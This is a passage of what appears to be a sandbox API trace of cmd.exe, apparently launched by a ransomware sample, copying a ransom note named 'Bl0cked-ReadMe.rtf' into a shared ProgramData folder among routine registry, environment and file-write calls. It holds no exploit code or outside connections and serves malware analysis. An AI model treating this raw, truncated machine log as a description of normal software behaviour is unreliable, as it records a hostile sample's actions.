lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x0, lpData=0x12ee58*=0x40, lpcbData=0x12ee50*=0x1000) returned 0x2 [0150.743] RegCloseKey (hKey=0x40) returned 0x0 [0150.743] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ee4c | out: phkResult=0x12ee4c*=0x40) returned 0x0 [0150.743] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x0, lpData=0x12ee58*=0x40, lpcbData=0x12ee50*=0x1000) returned 0x2 [0150.743] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x4, lpData=0x12ee58*=0x1, lpcbData=0x12ee50*=0x4) returned 0x0 [0150.743] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x0, lpData=0x12ee58*=0x1, lpcbData=0x12ee50*=0x1000) returned 0x2 [0150.743] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x4, lpData=0x12ee58*=0x0, lpcbData=0x12ee50*=0x4) returned 0x0 [0150.743] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x4, lpData=0x12ee58*=0x9, lpcbData=0x12ee50*=0x4) returned 0x0 [0150.743] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x4, lpData=0x12ee58*=0x9, lpcbData=0x12ee50*=0x4) returned 0x0 [0150.743] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, 
lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x0, lpData=0x12ee58*=0x9, lpcbData=0x12ee50*=0x1000) returned 0x2 [0150.743] RegCloseKey (hKey=0x40) returned 0x0 [0150.743] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886379 [0150.743] srand (_Seed=0x5b886379) [0150.743] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Bl0cked-ReadMe.rtf\"" [0150.743] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Bl0cked-ReadMe.rtf\"" [0150.743] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.744] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2818d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0150.744] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0150.744] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0150.744] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0150.744] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0150.744] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0150.744] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0150.744] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0150.744] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0150.744] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0150.744] _wcsicmp 
(_String1="PROMPT", _String2="RANDOM") returned -2 [0150.744] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0150.744] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0150.745] GetEnvironmentStringsW () returned 0x2822c8* [0150.745] FreeEnvironmentStringsW (penv=0x2822c8) returned 1 [0150.745] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.745] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0150.745] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0150.745] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0150.745] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0150.745] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0150.745] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0150.745] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0150.745] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0150.745] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0150.745] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12fc18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.745] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12fc18, lpFilePart=0x12fc14 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12fc14*="Desktop") returned 0x18 [0150.745] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0150.745] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f994 | out: lpFindFileData=0x12f994) returned 0x280008 [0150.746] FindClose (in: hFindFile=0x280008 | out: hFindFile=0x280008) returned 1 [0150.746] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f994 | out: 
lpFindFileData=0x12f994) returned 0x280008 [0150.746] FindClose (in: hFindFile=0x280008 | out: hFindFile=0x280008) returned 1 [0150.746] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f994 | out: lpFindFileData=0x12f994) returned 0x280008 [0150.746] FindClose (in: hFindFile=0x280008 | out: hFindFile=0x280008) returned 1 [0150.746] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0150.746] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0150.746] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0150.746] GetEnvironmentStringsW () returned 0x282ae8* [0150.747] FreeEnvironmentStringsW (penv=0x282ae8) returned 1 [0150.747] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.747] GetConsoleOutputCP () returned 0x1b5 [0150.747] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0150.747] GetUserDefaultLCID () returned 0x409 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12fd58, cchData=128 | out: lpLCData="0") returned 2 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12fd58, cchData=128 | out: lpLCData="0") returned 2 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12fd58, cchData=128 | out: lpLCData="1") returned 2 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: 
lpLCData="Tue") returned 4 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0150.748] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0150.750] GetConsoleTitleW (in: lpConsoleTitle=0x2708d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.750] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0150.750] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0150.750] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0150.750] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0150.751] _wcsicmp (_String1="type", _String2=")") returned 75 [0150.751] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0150.751] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0150.751] _wcsicmp (_String1="IF", _String2="type") returned -11 [0150.751] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0150.751] _wcsicmp (_String1="REM", _String2="type") returned -2 [0150.751] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0150.844] _get_osfhandle (_FileHandle=1) 
returned 0x7 [0150.844] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.844] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.844] GetFileType (hFile=0x7) returned 0x2 [0150.844] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0150.844] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12fc50 | out: lpMode=0x12fc50) returned 1 [0150.844] _dup (_FileHandle=1) returned 3 [0150.845] _close (_FileHandle=1) returned 0 [0150.845] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0150.845] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x12fc20, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0150.846] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0150.846] GetConsoleTitleW (in: lpConsoleTitle=0x12fa50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.847] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0150.847] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0150.847] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0150.847] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0150.847] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.848] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x12f5b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f5b4) returned 0x270e60 [0150.848] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0150.848] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0150.848] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: 
"c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0150.848] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x12e4c0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0150.848] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0150.848] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.848] GetFileType (hFile=0x54) returned 0x1 [0150.848] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.849] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x12e518 | out: lpFileSizeHigh=0x12e518*=0x0) returned 0x1632 [0150.849] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.849] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.849] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.849] ReadFile (in: hFile=0x54, lpBuffer=0x12f350, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e540, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesRead=0x12e540*=0x200, lpOverlapped=0x0) returned 1 [0150.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.849] GetFileType (hFile=0x4c) returned 0x1 [0150.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.849] GetFileType (hFile=0x4c) returned 0x1 [0150.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.849] WriteFile (in: hFile=0x4c, lpBuffer=0x12f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.850] GetFileType (hFile=0x4c) returned 0x1 [0150.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.850] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3a0*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3a0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.850] GetFileType (hFile=0x4c) returned 0x1 [0150.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.851] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3f0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.851] GetFileType (hFile=0x4c) returned 0x1 [0150.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.851] WriteFile (in: hFile=0x4c, lpBuffer=0x12f440*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f440*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.851] GetFileType (hFile=0x4c) returned 0x1 [0150.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.851] WriteFile (in: hFile=0x4c, lpBuffer=0x12f490*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f490*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.851] GetFileType (hFile=0x4c) returned 0x1 [0150.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.851] WriteFile (in: hFile=0x4c, lpBuffer=0x12f4e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f4e0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.851] GetFileType (hFile=0x4c) returned 0x1 [0150.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.851] WriteFile (in: hFile=0x4c, lpBuffer=0x12f530*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e534, 
lpOverlapped=0x0 | out: lpBuffer=0x12f530*, lpNumberOfBytesWritten=0x12e534*=0x20, lpOverlapped=0x0) returned 1 [0150.851] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.851] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e520 | out: lpNewFilePointer=0x0) returned 1 [0150.851] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.851] ReadFile (in: hFile=0x54, lpBuffer=0x12f350, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e540, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesRead=0x12e540*=0x200, lpOverlapped=0x0) returned 1 [0150.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.851] GetFileType (hFile=0x4c) returned 0x1 [0150.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] GetFileType (hFile=0x4c) returned 0x1 [0150.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] WriteFile (in: hFile=0x4c, lpBuffer=0x12f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] GetFileType (hFile=0x4c) returned 0x1 [0150.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3a0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] GetFileType (hFile=0x4c) returned 0x1 [0150.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3f0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] GetFileType (hFile=0x4c) returned 0x1 [0150.852] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] WriteFile (in: hFile=0x4c, lpBuffer=0x12f440*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f440*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] GetFileType (hFile=0x4c) returned 0x1 [0150.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] WriteFile (in: hFile=0x4c, lpBuffer=0x12f490*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f490*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] GetFileType (hFile=0x4c) returned 0x1 [0150.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] WriteFile (in: hFile=0x4c, lpBuffer=0x12f4e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f4e0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] GetFileType (hFile=0x4c) returned 0x1 [0150.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.853] WriteFile (in: hFile=0x4c, lpBuffer=0x12f530*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f530*, lpNumberOfBytesWritten=0x12e534*=0x20, lpOverlapped=0x0) returned 1 [0150.853] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.853] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e520 | out: lpNewFilePointer=0x0) returned 1 [0150.853] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.853] ReadFile (in: hFile=0x54, lpBuffer=0x12f350, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e540, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesRead=0x12e540*=0x200, lpOverlapped=0x0) returned 1 [0150.853] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0150.853] GetFileType (hFile=0x4c) returned 0x1 [0150.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.853] GetFileType (hFile=0x4c) returned 0x1 [0150.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.853] WriteFile (in: hFile=0x4c, lpBuffer=0x12f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.853] GetFileType (hFile=0x4c) returned 0x1 [0150.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.853] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3a0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.853] GetFileType (hFile=0x4c) returned 0x1 [0150.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.853] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3f0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.853] GetFileType (hFile=0x4c) returned 0x1 [0150.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.853] WriteFile (in: hFile=0x4c, lpBuffer=0x12f440*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f440*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.854] GetFileType (hFile=0x4c) returned 0x1 [0150.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.854] WriteFile (in: hFile=0x4c, lpBuffer=0x12f490*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f490*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) 
returned 1 [0150.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.854] GetFileType (hFile=0x4c) returned 0x1 [0150.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.854] WriteFile (in: hFile=0x4c, lpBuffer=0x12f4e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f4e0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.854] GetFileType (hFile=0x4c) returned 0x1 [0150.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.854] WriteFile (in: hFile=0x4c, lpBuffer=0x12f530*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f530*, lpNumberOfBytesWritten=0x12e534*=0x20, lpOverlapped=0x0) returned 1 [0150.854] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.854] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e520 | out: lpNewFilePointer=0x0) returned 1 [0150.854] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.854] ReadFile (in: hFile=0x54, lpBuffer=0x12f350, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e540, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesRead=0x12e540*=0x200, lpOverlapped=0x0) returned 1 [0150.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.854] GetFileType (hFile=0x4c) returned 0x1 [0150.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.854] GetFileType (hFile=0x4c) returned 0x1 [0150.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.854] WriteFile (in: hFile=0x4c, lpBuffer=0x12f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.854] GetFileType (hFile=0x4c) returned 0x1 [0150.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.854] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3a0*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3a0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.855] GetFileType (hFile=0x4c) returned 0x1 [0150.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.855] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3f0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.855] GetFileType (hFile=0x4c) returned 0x1 [0150.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.855] WriteFile (in: hFile=0x4c, lpBuffer=0x12f440*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f440*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.855] GetFileType (hFile=0x4c) returned 0x1 [0150.855] _get_osfhandle (_FileHandle=1) returned 